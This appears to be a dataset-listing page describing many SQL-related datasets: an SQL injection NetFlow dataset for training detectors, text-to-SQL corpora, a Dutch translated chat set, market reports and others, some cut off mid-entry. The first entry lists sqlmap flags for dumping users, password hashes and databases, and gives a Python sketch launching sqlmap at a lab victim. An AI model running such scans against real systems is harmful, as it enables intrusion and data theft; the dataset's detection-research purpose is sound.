Introduction

This dataset contains SQL injection attacks (SQLIA) as malicious NetFlow data. The attacks carried out are Union-query SQL injection and Blind SQL injection, performed with the SQLMAP tool. NetFlow traffic was generated using DOROTHEA (DOcker-based fRamework fOr gaTHering nEtflow trAffic). NetFlow is a network protocol developed by Cisco for collecting and monitoring network traffic flow data. A flow is defined as a unidirectional sequence of packets with some common properties that pass through a network device.

Datasets

The first dataset (D1) was collected to train the detection models, and a second (D2) was collected using different attacks than those used in training, to test the models and ensure their generalization. The datasets contain both benign and malicious traffic, and all collected datasets are balanced. The version of NetFlow used to build the datasets is 5.

Dataset  Aim       Samples   Benign-malicious traffic ratio
D1       Training  400,003   50%
D2       Test      57,239    50%

Infrastructure and implementation

Two sets of flow data were collected with DOROTHEA. DOROTHEA is a Docker-based framework for NetFlow data collection. It allows you to build interconnected virtual networks to generate and collect flow data using the NetFlow protocol. In DOROTHEA, network traffic packets are sent to a NetFlow generator with the ipt_netflow sensor installed. The sensor consists of a Linux kernel module using Iptables, which processes the packets and converts them to NetFlow flows. DOROTHEA is configured to use NetFlow v5 and to export a flow after it has been inactive for 15 seconds or active for 1,800 seconds (30 minutes).

Benign traffic generation nodes simulate network traffic generated by real users, performing tasks such as searching in web browsers, sending emails, or establishing Secure Shell (SSH) connections. Such tasks run as Python scripts; users may customize them or even incorporate their own. The network traffic is managed by a gateway that performs two main tasks: it routes packets to the Internet, and it sends them to a NetFlow data generation node (packets received from the Internet are handled similarly).

The malicious traffic (SQLIA) was generated using SQLMAP, a penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities. The attacks were executed from 16 nodes, each launching SQLMAP with the following parameters:

- '--banner', '--current-user', '--current-db', '--hostname', '--is-dba', '--users', '--passwords', '--privileges', '--roles', '--dbs', '--tables', '--columns', '--schema', '--count', '--dump', '--comments': enumerate users, password hashes, privileges, roles, databases, tables and columns
- --level=5: increase the probability of a false positive identification
- --risk=3: increase the probability of extracting data
- --random-agent: select the User-Agent randomly
- --batch: never ask for user input; use the default behavior
- --answers="follow=Y": predefine the answer to "follow" prompts as yes

Every node executed SQLIA on 200 victim nodes. The victim nodes each deployed a web form vulnerable to Union-type injection attacks, connected to a MySQL or SQL Server database engine (50% of the victim nodes deployed MySQL and the other 50% SQL Server). The web service was accessible on ports 443 and 80, the ports typically used to deploy web services. The IP address space was 182.168.1.1/24 for the benign and malicious traffic-generating nodes and 126.52.30.0/24 for the victim nodes.
The malicious traffic in the two datasets was collected under different conditions. For D1, SQLIA was performed using Union attacks against MySQL and SQL Server databases. For D2, Blind SQL injection attacks were performed against a web form connected to a PostgreSQL database. The IP address spaces of the networks were also different from those of D1: in D2, the address space was 152.148.48.1/24 for the benign and malicious traffic-generating nodes and 140.30.20.1/24 for the victim nodes. The MySQL server was MariaDB version 10.4.12; Microsoft SQL Server 2017 Express and PostgreSQL version 13 were also used.
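For illustration, a minimal Python sketch of how an attacking node might launch SQLMAP with the parameters listed above; the target URL is hypothetical, and only the flags are taken from the table:

import subprocess

# Hypothetical victim: a vulnerable web form on a node in the victim address space.
target = "http://126.52.30.10/form.php?id=1"

enumeration_flags = [
    "--banner", "--current-user", "--current-db", "--hostname", "--is-dba",
    "--users", "--passwords", "--privileges", "--roles", "--dbs",
    "--tables", "--columns", "--schema", "--count", "--dump", "--comments",
]

subprocess.run(
    ["sqlmap", "-u", target,
     "--level=5",           # perform more extensive tests
     "--risk=3",            # include payloads more likely to extract data
     "--random-agent",      # select the User-Agent randomly
     "--batch",             # never ask for user input; use defaults
     "--answers=follow=Y",  # predefined answer: follow redirects
     *enumeration_flags],
    check=True,
)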
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Overview
This dataset is built upon SQL Create Context, which in turn was constructed using data from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL queries answering the question using the CREATE statement as context. This dataset was built with text-to-SQL LLMs in mind, intending to prevent hallucination of column and table names often seen when trained on text-to-SQL datasets. The CREATE TABLE statement can often be… See the full description on the dataset page: https://huggingface.co/datasets/bugdaryan/sql-create-context-instruction.
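A sketch of what a single record plausibly looks like given the description above; the field names and example values are illustrative, not taken from the dataset:

example = {
    # Natural language question (hypothetical).
    "question": "How many heads of the departments are older than 56?",
    # Schema-only context: a CREATE TABLE statement, no rows of data.
    "context": "CREATE TABLE head (age INTEGER)",
    # SQL query answering the question using the context.
    "answer": "SELECT COUNT(*) FROM head WHERE age > 56",
}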
https://choosealicense.com/licenses/bsd-3-clause/
WikiSQL Dataset (Reformatted for Generative Models)
This is the exact same dataset as WikiSQL: https://huggingface.co/datasets/wikisql, but with the data reformatted to allow direct use with text generation LLMs. The original license and credits for the original dataset remain in place. Specifically, the changes from standard WikiSQL are:
The table details in WikiSQL were included as dictionaries, but tools like LangChain and LlamaIndex build their prompts using a SQL DESCRIBE of… See the full description on the dataset page: https://huggingface.co/datasets/tjaffri/wikisql-generate.
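A rough sketch of the kind of reformatting this implies; the dictionary layout below is an illustrative stand-in for WikiSQL's table format, not its exact field names:

# WikiSQL-style table description: column headers plus their types (illustrative).
table = {"header": ["Player", "No.", "Nationality"], "types": ["text", "real", "text"]}

# DDL-style text is closer to what LangChain/LlamaIndex-style prompts expect.
columns = ", ".join(f'"{name}" {sqltype}' for name, sqltype in zip(table["header"], table["types"]))
create_stmt = f"CREATE TABLE table_1 ({columns})"
print(create_stmt)  # CREATE TABLE table_1 ("Player" text, "No." real, "Nationality" text)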
http://www.apache.org/licenses/LICENSE-2.0
This dataset contains 56,964 conversations in Dutch between an AI assistant and a (fake, generated) "Human", specifically in the domain of programming (Stack Overflow). They are translations of Baize's machine-generated answers to the Stack Overflow dataset.
Data Instances
{'id': 9, 'input': 'Het gesprek tussen de mens en de AI-assistent. ' '[|Human|] Ik heb wat hulp nodig met Spark SQL union en het ordenen ' 'van kolommen. ' '[|AI|] Natuurlijk, ik help je graag. Waar heb je specifiek hulp ' 'bij nodig? ' '[|Human|] Ik wil de output van een UNION-query ordenen op een ' 'kolom die niet aanwezig is in de SELECT-instructie. Is dat ' 'mogelijk? ' '[|AI|] Ja, het is mogelijk met Spark SQL. Je kunt de ordinale ' 'positie van de kolom in de ORDER BY-clausule gebruiken in plaats ' 'van de kolomnaam. Als je bijvoorbeeld wilt ordenen op de derde ' 'kolom in de SELECT-instructie, kun je ORDER BY 3 gebruiken. ' '[|Human|] Dat is nuttig. Kan ik ook een alias gebruiken in de ' 'ORDER BY-clausule? ' '[|AI|] Ja, je kunt een alias gebruiken in de ORDER BY-clausule. De ' 'alias moet worden gedefinieerd in de SELECT-instructie. Als je ' 'bijvoorbeeld de derde kolom als "col3" alias geeft, kun je ordenen ' 'met ORDER BY col3. ' '[|Human|] Oké, ik denk dat ik het begrijp. Kan ik dezelfde alias ' 'gebruiken voor kolommen uit beide tabellen in de UNION? ' '[|AI|] Nee, je kunt dezelfde alias niet gebruiken voor kolommen ' 'uit beide tabellen in de UNION. Elke tabel in de UNION moet een ' 'unieke alias hebben voor de kolommen. ' '[|Human|] ', 'topic': 'Spark SQL UNION - ORDER BY kolom niet in SELECT'},
Data Fields
id: the ID of the item. The following 82 IDs are not included because they could not be translated: [1713, 1937, 1960, 4326, 4356, 8357, 8542, 8827, 9137, 9782, 11560, 11961, 12244, 12362, 12488, 13259, 13621, 14445, 14835, 15006, 17746, 18808, 19285, 19426, 19491, 21270, 21661, 22098, 23352, 23840, 23869, 25148, 25928, 27102, 27856, 28387, 29942, 30041, 30251, 32396, 32742, 32941, 33628, 34116, 34648, 34859, 35977, 35987, 36035, 36456, 37028, 37238, 37640, 38107, 38735, 39015, 40984, 41115, 41567, 42397, 43219, 43783, 44599, 44980, 45239, 47676, 48922, 49534, 50282, 50683, 50804, 50919, 51076, 51211, 52000, 52183, 52489, 52595, 53884, 54726, 55795, 56992]
input: the machine-generated conversation between AI and "Human". Always starts with Het gesprek tussen de mens en de AI-assistent. and has at least one occurrence of both [|AI|] and [|Human|].
topic: the topic description
Dataset Creation
Both the conversations and the topics were translated with OpenAI's API for gpt-3.5-turbo, using max_tokens=1024 and temperature=0 as parameters.
The prompt template to translate the input is (where src_lang was English and tgt_lang Dutch):
CONVERSATION_TRANSLATION_PROMPT = """You are asked to translate a conversation between an AI assistant and a human from {src_lang} into {tgt_lang}.
Here are the requirements that you should adhere to:
1. maintain the format: the conversation consists of the AI (marked as [|AI|]) and the human ([|Human|]) talking in turns and responding to each other;
2. do not translate the speaker identifiers [|AI|] and [|Human|] but always copy them into the translation in appropriate places;
3. ensure accurate translation and keep the correctness of the conversation;
4. make sure that text is fluent to read and does not contain grammatical errors. Use standard {tgt_lang} without regional bias;
5. translate the human's text using informal, but standard, language;
6. make sure to avoid biases (such as gender bias, grammatical bias, social bias);
7. if the human asks to correct grammar mistakes or spelling mistakes then you have to generate a similar mistake in {tgt_lang}, and then also generate a corrected output version for the AI in {tgt_lang};
8. if the human asks to translate text from one to another language, then you only translate the human's question to {tgt_lang} but you keep the translation that the AI provides in the language that the human requested;
9. do not translate code fragments but copy them as they are. If there are English examples, variable names or definitions in code fragments, keep them in English.
Now translate the following conversation with the requirements set out above. Do not provide an explanation and do not add anything else.
"""
The prompt to translate the topic is:
TOPIC_TRANSLATION_PROMPT = "Translate the following title of a conversation from {src_lang} to {tgt_lang} in a succinct,"
" summarizing manner. Translate accurately and formally. Do not provide any explanation"
" about the translation and do not include the original title.
"
The system message was:
You are a helpful assistant that translates English to Dutch to the requirements that are given to you.
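Putting the pieces together, a minimal sketch of how each conversation could have been submitted for translation, using the legacy openai client that matched the gpt-3.5-turbo era; the exact concatenation of prompt and conversation is an assumption:

import openai  # legacy (pre-1.0) client, contemporary with gpt-3.5-turbo

def translate_conversation(conversation: str, src_lang: str = "English", tgt_lang: str = "Dutch") -> str:
    prompt = CONVERSATION_TRANSLATION_PROMPT.format(src_lang=src_lang, tgt_lang=tgt_lang)
    response = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",
        max_tokens=1024,  # parameters as stated above
        temperature=0,
        messages=[
            {"role": "system", "content": "You are a helpful assistant that translates English "
                                          "to Dutch to the requirements that are given to you."},
            {"role": "user", "content": prompt + "\n" + conversation},
        ],
    )
    return response["choices"][0]["message"]["content"]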
Note that 82 items (0.1%) were not successfully translated: the translation was missing the AI identifier [|AI|] and/or the human one [|Human|]. These are the same 82 IDs listed under the id field above.
The translation quality has not been verified. Use at your own risk!
Licensing Information
Licensing info for Stack Overflow Questions is listed as Apache 2.0. If you use the current dataset, you should also adhere to the original license.
This text was generated (either in part or in full) with GPT-3 (gpt-3.5-turbo), OpenAI’s large-scale language-generation model. Upon generating draft language, the author reviewed, edited, and revised the language to their own liking and takes ultimate responsibility for the content of this publication.
If you use this dataset, you must also follow the Sharing and Usage policies.
As clearly stated in their Terms of Use, specifically 2c.iii, "[you may not] use output from the Services to develop models that compete with OpenAI". That means that you cannot use this dataset to build models that are intended to commercially compete with OpenAI. As far as I am aware, that is a specific restriction that should serve as an addendum to the current license.
This dataset is also available on the Hugging Face hub with the same DOI and license. See that README for more info.
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
This dataset builds from WikiSQL and Spider. There are 78,577 examples of natural language queries, SQL CREATE TABLE statements, and SQL queries answering the question using the CREATE statement as context. This dataset was built with text-to-SQL LLMs in mind, intending to prevent hallucination of column and table names often seen when models are trained on text-to-SQL datasets. The CREATE TABLE statement can often be copied and pasted from different DBMSs and provides table names, column names, and their data types. By providing just the CREATE TABLE statement as context, we can hopefully provide better grounding for models without having to provide actual rows of data, limiting token usage and exposure to private, sensitive, or proprietary data.
Apache License, v2.0: https://www.apache.org/licenses/LICENSE-2.0
License information was derived automatically
synthetic_text_to_sql
gretelai/synthetic_text_to_sql is a rich dataset of high quality synthetic Text-to-SQL samples, designed and generated using Gretel Navigator, and released under Apache 2.0. Please see our release blogpost for more details. The dataset includes:
- 105,851 records partitioned into 100,000 train and 5,851 test records
- ~23M total tokens, including ~12M SQL tokens
- Coverage across 100 distinct…
See the full description on the dataset page: https://huggingface.co/datasets/gretelai/synthetic_text_to_sql.
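A minimal sketch for loading the dataset with the Hugging Face datasets library; the train/test split names follow the partition described above:

from datasets import load_dataset

ds = load_dataset("gretelai/synthetic_text_to_sql")
print(ds["train"].num_rows, ds["test"].num_rows)  # expected: 100000 5851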
This dataset is a Portuguese-translated version of the b-mc2/sql-create-context dataset, constructed from the WikiSQL and Spider datasets. It contains examples of questions in Portuguese, SQL CREATE TABLE statements, and SQL queries that answer the questions using the CREATE TABLE statement as context. The main goal of this dataset is to assist Portuguese natural language models in generating precise and contextualised SQL queries, preventing the hallucination of column and table names, a common issue in text-to-SQL datasets. By providing only the CREATE TABLE statement as context, the dataset aims to better ground the models without the need to provide actual data rows, limiting token use and exposure to private, sensitive, or proprietary data.
This dataset consists of 78,577 entries. Each entry represents a question about a database, the context of the database schema, and the corresponding SQL query. Data files are typically in CSV format. The 'pergunta' (question) column contains 78,220 unique values, 'contexto' (context) has 72,947 unique values, and 'resposta' (answer) has 78,577 unique values.
This dataset is ideal for: * Training natural language models for SQL query generation, especially in scenarios where accuracy in naming columns and tables is crucial. * Enhancing model performance in text-to-SQL tasks. * Supporting natural language processing and machine learning tasks related to generating structured queries from natural language.
The dataset has a global region scope and focuses on the Portuguese language. The questions were translated into Portuguese using the facebook/nllb-200-distilled-1.3B model. It was listed on 22/06/2025.
CC-BY-NC
This dataset is suitable for: * Data scientists and analysts focused on developing and refining natural language processing models. * Researchers and developers working on text-to-SQL solutions. * Anyone aiming to build or improve AI models that translate natural language queries into SQL, particularly for Portuguese.
Original Data Source: Portuguese Text2SQL database
WikiSQL consists of a corpus of 87,726 hand-annotated SQL query and natural language question pairs. These SQL queries are further split into training (61,297 examples), development (9,145 examples) and test sets (17,284 examples). It can be used for natural language inference tasks related to relational databases.
https://www.verifiedmarketresearch.com/privacy-policy/
SQL In-Memory Database Market size was valued at USD 9.26 Billion in 2024 and is projected to reach USD 35.7 Billion by 2032, growing at a CAGR of 20.27% from 2026 to 2032.
SQL In-Memory Database Market Drivers
Demand for Real-Time Analytics and Processing: Businesses increasingly require real-time insights from their data to make faster and more informed decisions. SQL In-Memory databases excel at processing data much faster than traditional disk-based databases, enabling real-time analytics and operational dashboards.
Growth of Big Data and IoT Applications: The rise of Big Data and the Internet of Things (IoT) generates massive amounts of data that needs to be processed quickly. SQL In-Memory databases can handle these high-velocity data streams efficiently due to their in-memory architecture.
Improved Performance for Transaction Processing Systems (TPS): In-memory databases offer significantly faster query processing times compared to traditional databases. This translates to improved performance for transaction-intensive applications like online banking, e-commerce platforms, and stock trading systems.
Reduced Hardware Costs (in some cases): While implementing an in-memory database might require an initial investment in additional RAM, it can potentially reduce reliance on expensive high-performance storage solutions in specific scenarios.
Focus on User Experience and Application Responsiveness: In today's digital landscape, fast and responsive applications are crucial. SQL In-Memory databases contribute to a smoother user experience by enabling quicker data retrieval and transaction processing.
However, it's important to consider some factors that might influence market dynamics:
Limited Data Capacity: In-memory databases are typically limited by the amount of available RAM, making them less suitable for storing massive datasets compared to traditional disk-based solutions.
Higher Implementation Costs: Setting up and maintaining an in-memory database can be more expensive due to the additional RAM requirements compared to traditional databases.
Hybrid Solutions: Many organizations opt for hybrid database solutions that combine in-memory and disk-based storage, leveraging the strengths of both for different data sets and applications.
https://creativecommons.org/publicdomain/zero/1.0/
This SQL project is focused on analyzing sales data from a relational database to gain insights into customer behavior, store performance, product sales, and the effectiveness of sales representatives. By executing a series of complex SQL queries across multiple tables, the project aggregates key metrics, such as total units sold and total revenue, and links them with customer, store, product, and staff details.

Key Objectives:
- Customer Analysis: Understand customer purchasing patterns by analyzing the total number of units and revenue generated per customer.
- Product and Category Insights: Evaluate product performance and its category's impact on overall sales.
- Store Performance: Identify which stores generate the most revenue and handle the highest sales volume.
- Sales Representative Effectiveness: Assess the performance of sales representatives by linking sales data with each representative's handled orders.

Techniques Used:
- SQL Joins: The project integrates data from multiple tables, including orders, customers, order_items, products, categories, stores, and staffs, using INNER JOIN to merge information from related tables.
- Aggregation: SUM functions are used to compute total units sold and revenue generated by each order, providing valuable insights into sales performance.
- Grouping: Data is grouped by order ID, customer, product, store, and sales representative, ensuring accurate and summarized sales metrics.

Use Cases:
- Business Decision-Making: The analysis can help businesses identify high-performing products and stores, optimize inventory, and evaluate the impact of sales teams.
- Market Segmentation: Segment customers based on geographic location (city/state) and identify patterns in purchasing behavior.
- Sales Strategy Optimization: Provide recommendations to improve sales strategies by analyzing product categories and sales rep performance.
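To make the pattern concrete, a condensed, runnable sketch of the central join-and-aggregate query described above, using SQLite for illustration; the column names (order_id, quantity, list_price, ...) are assumptions, since only the table names appear in the description:

import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE customers   (customer_id INTEGER PRIMARY KEY, name TEXT, city TEXT);
CREATE TABLE orders      (order_id INTEGER PRIMARY KEY, customer_id INTEGER, store_id INTEGER);
CREATE TABLE order_items (order_id INTEGER, quantity INTEGER, list_price REAL);

INSERT INTO customers   VALUES (1, 'Ada', 'Austin'), (2, 'Lin', 'Boston');
INSERT INTO orders      VALUES (10, 1, 1), (11, 2, 1);
INSERT INTO order_items VALUES (10, 2, 9.99), (10, 1, 24.50), (11, 5, 3.00);
""")

# Total units and revenue per order, joined to the customer -- the same
# INNER JOIN + SUM + GROUP BY pattern the project applies across all seven tables.
query = """
SELECT o.order_id,
       c.name,
       SUM(oi.quantity)                 AS total_units,
       SUM(oi.quantity * oi.list_price) AS total_revenue
FROM orders o
INNER JOIN customers   c  ON c.customer_id = o.customer_id
INNER JOIN order_items oi ON oi.order_id   = o.order_id
GROUP BY o.order_id, c.name;
"""
for row in conn.execute(query):
    print(row)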
https://dataintelo.com/privacy-and-policy
The global market size for NEWSQL In Memory Databases was estimated at USD 3.8 billion in 2023 and is projected to reach USD 10.9 billion by 2032, growing at a remarkable compound annual growth rate (CAGR) of 12.3% during the forecast period. The growth of this market is primarily driven by the increasing demand for high-speed data processing and real-time analytics across various industries. As businesses continue to generate vast amounts of data, there is a growing need for efficient database management solutions that can handle these large data volumes with low latency. The adoption of NEWSQL In Memory databases, which combine the scalability of NoSQL with the ACID compliance of traditional SQL databases, is thus on the rise.
The demand for real-time data analytics and processing is a significant growth driver for the NEWSQL In Memory Database market. As industries such as BFSI, healthcare, and retail increasingly rely on data-driven decision-making processes, the need for fast and efficient database solutions becomes paramount. NEWSQL In Memory databases provide the ability to process large datasets quickly, enabling businesses to gain insights and make decisions in real time. This is particularly crucial in sectors like finance and healthcare, where timely information can significantly impact outcomes.
The advent of technologies such as artificial intelligence (AI), machine learning (ML), and Internet of Things (IoT) also fuels the growth of the NEWSQL In Memory Database market. These technologies generate immense amounts of data, requiring robust database solutions that can handle high-throughput and low-latency transactions. NEWSQL In Memory databases are well-suited for these applications, providing the necessary speed and scalability to manage the data efficiently. Furthermore, the rising adoption of cloud computing and the shift towards digital transformation in various industries further bolster the market's expansion.
Another crucial factor contributing to the market's growth is the increasing emphasis on customer experience and personalized services. Businesses are leveraging data to understand customer behavior, preferences, and trends to offer tailored experiences. NEWSQL In Memory databases enable organizations to analyze customer data in real time, enhancing their ability to provide personalized services. This is evident in the retail sector, where businesses use real-time analytics to optimize inventory, improve customer engagement, and boost sales.
In-Memory Grid technology plays a pivotal role in enhancing the performance of NEWSQL In Memory databases. By storing data in the main memory, In-Memory Grids significantly reduce data retrieval times, allowing for faster data processing and real-time analytics. This capability is particularly beneficial in scenarios where rapid access to data is crucial, such as in financial transactions or healthcare diagnostics. The integration of In-Memory Grid technology with NEWSQL databases not only boosts speed but also improves scalability, enabling businesses to handle larger datasets efficiently. As industries continue to demand high-speed data processing solutions, the adoption of In-Memory Grids is expected to rise, further driving the growth of the NEWSQL In Memory Database market.
On a regional level, North America holds a significant share of the NEWSQL In Memory Database market, driven by the presence of major technology companies and early adoption of advanced database solutions. The Asia Pacific region is expected to witness the highest growth rate during the forecast period, owing to the rapid digitalization and increasing investments in technology infrastructure. Europe also shows substantial potential, with a growing focus on data-driven strategies and compliance with stringent data regulations.
The NEWSQL In Memory Database market can be segmented by type into operational and analytical databases. Operational databases are designed to handle real-time transaction processing, making them ideal for applications that require fast and efficient data entry and retrieval. These databases are commonly used in industries such as finance, retail, and telecommunications, where the ability to process transactions quickly is critical. The demand for operational NEWSQL In Memory databases is growing as businesses increasingly rely on real-time data for decision-making and operational efficiency.
https://dataintelo.com/privacy-and-policy
The global SQL in-memory database market size is projected to grow significantly from $6.5 billion in 2023 to reach $17.2 billion by 2032, reflecting a robust compound annual growth rate (CAGR) of 11.4%. This growth is driven by the increasing demand for high-speed data processing and real-time analytics across various sectors.
The primary growth factor for the SQL in-memory database market is the increasing need for real-time data processing capabilities. As businesses across the globe transition towards digitalization and data-driven decision-making, the demand for solutions that can process large volumes of data in real time is surging. In-memory databases, which store data in the main memory rather than on disk, offer significantly faster data retrieval speeds compared to traditional disk-based databases, making them an ideal solution for applications requiring real-time analytics and high transaction processing speeds.
Another significant growth driver is the rising adoption of big data and advanced analytics. Organizations are increasingly leveraging big data technologies to gain insights and make informed decisions. SQL in-memory databases play a crucial role in this context by enabling faster data processing and analysis, thus allowing businesses to quickly derive actionable insights from large datasets. This capability is particularly beneficial in sectors such as finance, healthcare, and retail, where real-time data processing is essential for operational efficiency and competitive advantage.
Furthermore, the growing trend of cloud computing is also propelling the SQL in-memory database market. Cloud deployment offers several advantages, including scalability, cost efficiency, and flexibility, which are driving businesses to adopt cloud-based in-memory database solutions. The increasing adoption of cloud services is expected to further boost the market growth as more enterprises migrate their data and applications to the cloud to leverage these benefits.
In-Memory Data Grids are becoming increasingly relevant in the SQL in-memory database market due to their ability to provide scalable and distributed data storage solutions. These grids enable organizations to manage large volumes of data across multiple nodes, ensuring high availability and fault tolerance. By leveraging in-memory data grids, businesses can achieve faster data processing and improved application performance, which is crucial for real-time analytics and decision-making. The integration of in-memory data grids with SQL databases allows for seamless data access and manipulation, enhancing the overall efficiency of data-driven applications. As the demand for high-speed data processing continues to grow, the adoption of in-memory data grids is expected to rise, providing significant opportunities for market expansion.
Regionally, North America is expected to dominate the SQL in-memory database market, followed by Europe and the Asia Pacific. The presence of key market players, advanced IT infrastructure, and early adoption of innovative technologies are some of the factors contributing to the market's growth in North America. Additionally, the Asia Pacific region is anticipated to witness the highest growth rate during the forecast period, driven by the rapid digital transformation initiatives, increasing investment in IT infrastructure, and the growing adoption of cloud services in countries like China, India, and Japan.
The SQL In Memory Database market can be segmented into three primary components: Software, Hardware, and Services. Software solutions form the backbone of in-memory databases, comprising database management systems and other necessary applications for data processing. These software solutions are designed to leverage the speed and efficiency of in-memory storage to deliver superior performance in data-intensive applications. The ongoing advancements in software technology, such as enhanced data compression and indexing, are further driving the adoption of in-memory database software. The increasing need for high-performance computing and the rise of big data analytics are also significant factors contributing to the growth of this segment.
Hardware components are integral to the SQL in-memory database market as they provide the necessary infrastructure to support high-speed data processing. This segment includes high-capacity servers, memory chip
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
PLBD (Protein Ligand Binding Database) table description XML file
=================================================================
General
-------
The provided ZIP archive contains an XML file "main-database-description.xml" with the description of all tables (VIEWS) that are exposed publicly at the PLBD server (https://plbd.org/). In the XML file, all columns of the visible tables are described, specifying their SQL types, measurement units, semantics, calculation formulae, SQL statements that can be used to generate values in these columns, and publications of the formulae derivations.
The XML file conforms to the published XSD schema created for descriptions of relational databases for specifications of scientific measurement data. The XSD schema ("relational-database_v2.0.0-rc.18.xsd") and all included sub-schemas are provided in the same archive for convenience. All XSD schemas are validated against the "XMLSchema.xsd" schema from the W3C consortium.
The ZIP file contains an excerpt of the files hosted at https://plbd.org/ at the moment of submission of the PLBD database to the Scientific Data journal, and is provided to conform to the journal's policies. The current data and schemas should be fetched from the published URIs:
https://plbd.org/
https://plbd.org/doc/db/schemas
https://plbd.org/doc/xml/schemas
The software used to generate SQL schemas and RestfulDB metadata, as well as the RestfulDB middleware that allows publishing databases generated from the XML description on the Web, is available in public Subversion repositories:
svn://www.crystallography.net/solsa-database-scripts
svn://saulius-grazulis.lt/restfuldb
Usage
-----
Unpacking the ZIP file will create a "db/" directory with the tree layout given below. In addition to the database description file "main-database-description.xml", all XSD schemas necessary for validation of the XML file are provided. On a GNU/Linux operating system with the GNU Make package installed, the XML file's validity can be checked by unpacking the ZIP file, entering the unpacked directory, and running 'make distclean; make'. For example, on a Linux Mint distribution, the following commands should work:
unzip main-database-description.zip
cd db/release/v0.10.0/tables/
sh -x dependencies/Linuxmint-20.1/install.sh
make distclean
make
If necessary, additional packages can be installed using the 'install.sh' script in the 'dependencies/' subdirectory corresponding to your operating system. As of the moment of writing, Debian-10 and Linuxmint-20.1 OSes are supported out of the box; similar OSes might work with the same 'install.sh' scripts. The installation scripts require running the package installation command with system administrator privileges, but they use *only* the standard system package manager, so they should not put your system at risk. For validation and syntax checking, the 'rxp' and 'xmllint' programs are used.
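An equivalent check can be sketched in Python with lxml; lxml is an assumption on our part, not part of the package, and the paths follow the unpacked tree layout shown below:

from lxml import etree

# Validate the description file against the published XSD schema.
schema = etree.XMLSchema(etree.parse("schema/relational-database_v2.0.0-rc.18.xsd"))
doc = etree.parse("main-database-description.xml")

print(schema.validate(doc))  # True if the description conforms to the schema
for error in schema.error_log:
    print(error)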
The log files provided in the "outputs/validation" subdirectory contain validation logs obtained on the system where the XML files were last checked, and should indicate the validity of the provided XML file against the referenced schemas.
Layout of the archived file tree
--------------------------------
db/
└── release
└── v0.10.0
└── tables
├── Makeconfig-validate-xml
├── Makefile
├── Makelocal-validate-xml
├── dependencies
├── main-database-description.xml
├── outputs
└── schema
Attribution 4.0 (CC BY 4.0): https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
A collection of datasets and python scripts for extraction and analysis of isograms (and some palindromes and tautonyms) from corpus-based word-lists, specifically Google Ngram and the British National Corpus (BNC). Below follows a brief description, first, of the included datasets and, second, of the included scripts.

1. Datasets

The data from English Google Ngrams and the BNC is available in two formats: as a plain text CSV file and as a SQLite3 database.

1.1 CSV format

The CSV files for each dataset actually come in two parts: one labelled ".csv" and one ".totals". The ".csv" contains the actual extracted data, and the ".totals" file contains some basic summary statistics about the ".csv" dataset with the same name.

The CSV files contain one row per data point, with the columns separated by a single tab stop. There are no labels at the top of the files. Each line has the following columns, in this order (the labels below are what I use in the database, which has an identical structure, see section below):
Label Data type Description
isogramy int The order of isogramy, e.g. "2" is a second order isogram
length int The length of the word in letters
word text The actual word/isogram in ASCII
source_pos text The Part of Speech tag from the original corpus
count int Token count (total number of occurences)
vol_count int Volume count (number of different sources which contain the word)
count_per_million int Token count per million words
vol_count_as_percent int Volume count as percentage of the total number of volumes
is_palindrome bool Whether the word is a palindrome (1) or not (0)
is_tautonym bool Whether the word is a tautonym (1) or not (0)
The ".totals" files have a slightly different format, with one row per data point, where the first column is the label and the second column is the associated value. The ".totals" files contain the following data:
Label Data type Description
!total_1grams int The total number of words in the corpus
!total_volumes int The total number of volumes (individual sources) in the corpus
!total_isograms int The total number of isograms found in the corpus (before compacting)
!total_palindromes int How many of the isograms found are palindromes
!total_tautonyms int How many of the isograms found are tautonyms
The CSV files are mainly useful for further automated data processing. For working with the data set directly (e.g. to do statistics or cross-check entries), I would recommend using the database format described below.

1.2 SQLite database format

On the other hand, the SQLite database combines the data from all four of the plain text files, and adds various useful combinations of the two datasets, namely:
• Compacted versions of each dataset, where identical headwords are combined into a single entry.
• A combined compacted dataset, combining and compacting the data from both Ngrams and the BNC.
• An intersected dataset, which contains only those words which are found in both the Ngrams and the BNC dataset.
The intersected dataset is by far the least noisy, but is missing some real isograms, too. The columns/layout of each of the tables in the database is identical to that described for the CSV/.totals files above. To get an idea of the various ways the database can be queried for various bits of data, see the R script described below, which computes statistics based on the SQLite database.

2. Scripts

There are three scripts: one for tidying Ngram and BNC word lists and extracting isograms, one to create a neat SQLite database from the output, and one to compute some basic statistics from the data. The first script can be run using Python 3, the second using SQLite 3 from the command line, and the third in R/RStudio (R version 3).

2.1 Source data

The scripts were written to work with word lists from Google Ngram and the BNC, which can be obtained from http://storage.googleapis.com/books/ngrams/books/datasetsv2.html and https://www.kilgarriff.co.uk/bnc-readme.html (download all.al.gz). For Ngram the script expects the path to the directory containing the various files, for BNC the direct path to the *.gz file.

2.2 Data preparation

Before processing proper, the word lists need to be tidied to exclude superfluous material and some of the most obvious noise. This will also bring them into a uniform format. Tidying and reformatting can be done by running one of the following commands:

python isograms.py --ngrams --indir=INDIR --outfile=OUTFILE
python isograms.py --bnc --indir=INFILE --outfile=OUTFILE

Replace INDIR/INFILE with the input directory or filename and OUTFILE with the filename for the tidied and reformatted output.

2.3 Isogram Extraction

After preparing the data as above, isograms can be extracted by running the following command on the reformatted and tidied files:

python isograms.py --batch --infile=INFILE --outfile=OUTFILE

Here INFILE should refer to the output from the previous data cleaning process. Please note that the script will actually write two output files, one named OUTFILE with a word list of all the isograms and their associated frequency data, and one named "OUTFILE.totals" with very basic summary statistics.

2.4 Creating a SQLite3 database

The output data from the above step can be easily collated into a SQLite3 database which allows for easy querying of the data directly for specific properties. The database can be created by following these steps:
1. Make sure the files with the Ngrams and BNC data are named "ngrams-isograms.csv" and "bnc-isograms.csv" respectively. (The script assumes you have both of them; if you only want to load one, just create an empty file for the other one.)
2. Copy the "create-database.sql" script into the same directory as the two data files.
3. On the command line, go to the directory where the files and the SQL script are.
4. Type: sqlite3 isograms.db < create-database.sql
5. This will create a database called "isograms.db".
See section 1 for a basic description of the output data and how to work with the database.

2.5 Statistical processing

